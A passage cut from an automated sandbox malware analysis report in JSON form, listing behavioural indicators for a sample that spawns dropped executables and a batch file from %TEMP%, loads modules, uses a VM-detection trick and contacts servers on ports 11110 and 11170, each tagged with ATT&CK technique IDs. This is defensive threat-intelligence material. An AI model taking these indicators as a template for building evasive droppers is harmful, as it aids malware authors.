(UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Heap32First (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Heap32Next (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Toolhelp32ReadProcessMemory (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Thread32First (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Thread32Next (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Module32Next (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Module32FirstW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Module32NextW (UID: 00000000-00001924)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001552)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001552)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"110012009e283677@CRYPTBASE.dll\"\n \"0d000e00844bff69@iphlpapi.dll\"\n \"0f001000dc4bff69@iphlpapi.dll\"\n \"0c000d00244cff69@iphlpapi.dll\"\n \"140015006c4cff69@iphlpapi.dll\"\n \"0c000d00e04cff69@iphlpapi.dll\"\n \"15001600c03eff69@ADVAPI32.dll\"\n \"0e000f00703fff69@ADVAPI32.dll\"\n \"0e000f00cc3fff69@ADVAPI32.dll\"\n \"11001200b447ff69@ADVAPI32.dll\"\n \"110012004848ff69@ADVAPI32.dll\"\n \"120013008c48ff69@ADVAPI32.dll\"\n \"12001300e448ff69@ADVAPI32.dll\"\n \"14001500386eff69@ADVAPI32.dll\"\n \"14001500506eff69@ADVAPI32.dll\"\n \"14001500686eff69@ADVAPI32.dll\"\n \"17001800806eff69@ADVAPI32.dll\"\n \"0d000e00986eff69@ADVAPI32.dll\"\n \"11001200a86eff69@ADVAPI32.dll\"\n \"11001200bc6eff69@ADVAPI32.dll\"\n \"0d000e003449ff69@SHELL32.dll\"\n \"0d000e00b049ff69@SHELL32.dll\"\n \"0f001000fc6fff69@ADVAPI32.dll\"\n \"140015003c70ff69@ADVAPI32.dll\"\n \"140015005470ff69@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005832)\n \"meorm.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006120)\n \"lojebo.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003636)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\meorm.exe\"\" - (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\_vslite.bat\"\" - (UID: 00000000-00005832)\n \"meorm.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\lojebo.exe\" OK\" - (UID: 00000000-00006120)\n \"lojebo.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\ywrej.exe\"\" - (UID: 00000000-00003636)\n \"lojebo.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\_vslite.bat\"\" - (UID: 00000000-00003636)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-2", "type": 10, "name": "Loads rich edit control libraries", "description": "\"ywrej.exe\" loaded module \"%WINDIR%\\System32\\riched20.dll\" at 69EE0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:11110\"\n \"<IPv4>:11170\"\n \"<IPv4>:11110\"\n \"<IPv4>:11110\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an executable section named \".text\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an executable section named \".?xL\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an executable section named \".htext\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an executable section named \".-(H\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an executable section named \".Jk)\"\n \"ywrej.exe\" has an executable section named \"UPX0\"\n \"ywrej.exe\" has an executable section named \"UPX1\"\n \"DISMHOST.EXE.67A48065.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an writable section named \".text\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an writable section named \".reloc\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an writable section named \".htext\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has an writable section named \".R*O\"\n \"ywrej.exe\" has an writable section named \"UPX0\"\n \"ywrej.exe\" has an writable section named \"UPX1\"\n \"ywrej.exe\" has an writable section named \".rsrc\"\n \"DISMHOST.EXE.67A48065.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".Jk)\" is \"0x664e00\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"DISMHOST.EXE.67A48065.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-26", "type": 8, "relevance": 5, "name": "The input sample possibly contains the RDTSCP instruction", "description": "Found VM detection artifact \"RDTSCP trick\" in \"sample.bin\" (Offset: 6022049)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"KERNEL32.DLL\" at base 76a60000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"OLE32.DLL\" at base 75b00000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f30000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73c20000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"ADVAPI32.DLL\" at base 75a50000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"PROPSYS.DLL\" at base 73de0000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"COMCTL32.DLL\" at base 73f30000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"OLEAUT32.DLL\" at base 77090000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"SHELL32.DLL\" at base 75c60000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"CLBCATQ.DLL\" at base 769d0000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73de0000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"NTMARTA.DLL\" at base 744a0000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 753d0000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"PROFAPI.DLL\" at base 75050000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"APPHELP.DLL\" at base 74ee0000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6d800000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 75c60000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76a60000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"SETUPAPI.DLL\" at base 753f0000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"RPCRT4.DLL\" at base 772d0000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75270000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75590000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"SECUR32.DLL\" at base 74d70000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 752e0000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70c60000\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74ee0000\n \"meorm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73c20000\n \"meorm.exe\" loaded module \"DWMAPI.DLL\" at base 73c60000\n \"meorm.exe\" loaded module \"ADVAPI32.DLL\" at base 75a50000\n \"meorm.exe\" loaded module \"KERNEL32.DLL\" at base 76a60000\n \"meorm.exe\" loaded module \"OLE32.DLL\" at base 75b00000\n \"meorm.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f30000\n \"meorm.exe\" loaded module \"PROPSYS.DLL\" at base 73de0000\n \"meorm.exe\" loaded module \"COMCTL32.DLL\" at base 73f30000\n \"meorm.exe\" loaded module \"OLEAUT32.DLL\" at base 77090000\n \"meorm.exe\" loaded module \"SHELL32.DLL\" at base 75c60000\n \"meorm.exe\" loaded module \"CLBCATQ.DLL\" at base 769d0000\n \"meorm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73de0000\n \"meorm.exe\" loaded module \"NTMARTA.DLL\" at base 744a0000\n \"meorm.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 753d0000\n \"meorm.exe\" loaded module \"PROFAPI.DLL\" at base 75050000\n \"meorm.exe\" loaded module \"APPHELP.DLL\" at base 74ee0000\n \"meorm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6d800000\n \"meorm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 75c60000\n \"meorm.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76a60000\n \"meorm.exe\" loaded module \"SETUPAPI.DLL\" at base 753f0000\n \"meorm.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75270000\n \"meorm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75590000\n \"meorm.exe\" loaded module \"RPCRT4.DLL\" at base 772d0000\n \"meorm.exe\" loaded module \"SECUR32.DLL\" at base 74d70000\n \"meorm.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 752e0000\n \"meorm.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70c60000\n \"meorm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74ee0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71070000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 76a60000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"ADVAPI32.DLL\" at base 75a50000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73c20000\n \"lojebo.exe\" loaded module \"DWMAPI.DLL\" at base 73c60000\n \"lojebo.exe\" loaded module \"ADVAPI32.DLL\" at base 75a50000\n \"lojebo.exe\" loaded module \"KERNEL32.DLL\" at base 76a60000\n \"lojebo.exe\" loaded module \"DHCPCSVC.DLL\" at base 730f0000\n \"lojebo.exe\" loaded module \"IPHLPAPI.DLL\" at base 73240000\n \"lojebo.exe\" loaded module \"RPCRT4.DLL\" at base 772d0000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73610000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 72fc0000\n \"lojebo.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 753d0000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 72f50000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74a00000\n \"lojebo.exe\" loaded module \"DNSAPI.DLL\" at base 748c0000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 72f40000\n \"lojebo.exe\" loaded module \"WS2_32.DLL\" at base 759b0000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74560000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73170000\n \"lojebo.exe\" loaded module \"RASADHLP.DLL\" at base 70cf0000\n \"lojebo.exe\" loaded module \"OLE32.DLL\" at base 75b00000\n \"lojebo.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f30000\n \"lojebo.exe\" loaded module \"PROPSYS.DLL\" at base 73de0000\n \"lojebo.exe\" loaded module \"COMCTL32.DLL\" at base 73f30000\n \"lojebo.exe\" loaded module \"OLEAUT32.DLL\" at base 77090000\n \"lojebo.exe\" loaded module \"SHELL32.DLL\" at base 75c60000\n \"lojebo.exe\" loaded module \"CLBCATQ.DLL\" at base 769d0000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73de0000\n \"lojebo.exe\" loaded module \"NTMARTA.DLL\" at base 744a0000\n \"lojebo.exe\" loaded module \"PROFAPI.DLL\" at base 75050000\n \"lojebo.exe\" loaded module \"APPHELP.DLL\" at base 74ee0000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6d800000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 75c60000\n \"lojebo.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76a60000\n \"lojebo.exe\" loaded module \"SETUPAPI.DLL\" at base 753f0000\n \"lojebo.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75270000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75590000\n \"lojebo.exe\" loaded module \"SECUR32.DLL\" at base 74d70000\n \"lojebo.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 752e0000\n \"lojebo.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70c60000\n \"lojebo.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74ee0000\n \"ywrej.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71070000\n \"ywrej.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ywrej.exe\" loaded module \"KERNEL32\" at base 76a60000\n \"ywrej.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ywrej.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b300000\n \"ywrej.exe\" loaded module \"KERNEL32.DLL\" at base 76a60000\n \"ywrej.exe\" loaded module \"ADVAPI32.DLL\" at base 75a50000\n \"ywrej.exe\" loaded module \"COMCTL32.DLL\" at base 73f30000\n \"ywrej.exe\" loaded module \"COMDLG32.DLL\" at base 756e0000\n \"ywrej.exe\" loaded module \"GDI32.DLL\" at base 76980000\n \"ywrej.exe\" loaded module \"MSIMG32.DLL\" at base 6d930000\n \"ywrej.exe\" loaded module \"OLE32.DLL\" at base 75b00000\n \"ywrej.exe\" loaded module \"OLEAUT32.DLL\" at base 77090000\n \"ywrej.exe\" loaded module \"SHELL32.DLL\" at base 75c60000\n \"ywrej.exe\" loaded module \"USER32.DLL\" at base 75790000\n \"ywrej.exe\" loaded module \"VERSION.DLL\" at base 744d0000\n \"ywrej.exe\" loaded module \"WINSPOOL.DRV\" at base 702e0000\n \"ywrej.exe\" loaded module \"IMM32.DLL\" at base 75760000\n \"ywrej.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73c20000\n \"ywrej.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f30000\n \"ywrej.exe\" loaded module \"DWMAPI.DLL\" at base 73c60000\n \"ywrej.exe\" loaded module \"UXTHEME.DLL\" at base 73c20000\n \"ywrej.exe\" loaded module \"COMCTL32\" at base 73f30000\n \"ywrej.exe\" loaded module \"RICHED20.DLL\" at base 69ee0000\n \"ywrej.exe\" loaded module \"WS2_32.DLL\" at base 759b0000\n \"ywrej.exe\" loaded module \"FWPUCLNT.DLL\" at base 73170000\n \"ywrej.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 75b00000\n \"ywrej.exe\" loaded module \"CLBCATQ.DLL\" at base 769d0000\n \"ywrej.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 768b0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\_vslite.bat (UID: 00000000-00005832)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006120)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004296)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004296)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004296)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004296)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004296)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\_vslite.bat (UID: 00000000-00003636)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadLibrary\" 